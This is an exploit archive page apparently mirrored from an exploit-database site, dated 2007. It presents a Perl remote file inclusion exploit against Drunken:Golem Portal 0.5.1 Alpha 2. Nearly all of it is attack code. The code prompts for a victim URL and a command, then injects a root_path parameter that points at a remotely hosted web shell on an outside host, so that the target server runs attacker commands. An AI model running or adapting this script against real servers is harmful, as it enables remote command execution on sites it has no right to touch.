[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Drunken:Golem Portal 0.5.1 Alpha 2 Remote File Include Exploit
# Published : 2007-01-27
# Author : MackRulZ
# Previous Title : ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
# Next Title : ACGVannu <= 1.3 (index2.php) Remote User Pass Change Vulnerability
#(C) MackRulZ - 2007
#
# [Bug name: Drunken:Golem Gaming Portal (root_path) Remote File Include Exploit
#
# [Script Name: Xero Portal v1.2
#
# [Wrong Codes: require($phpbb_root_path . 'includes/bbcode.'.$phpEx);
#
$rfi = "phpIRC.php?root_path=";
$path = "/include/irc/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // TurkishnPlz Select Lang:n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) Mackrulzn";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan MackruLzn";
&ex;
}
else {print "Plz Select Langugen"; exit;}
sub ex{
$not = "Victim is Not Vunl.n" and $not_cmd = "Victim is Vunl but Not doing Exec.n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yokn" and $not_cmd = "Adresde Ac.k Var Fakat Kod Calismiyorn"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) Mackrulzn$thx: xoronn";
sleep 3;
system("start $acacaz");
}
# www.Syue.com [2007-01-27]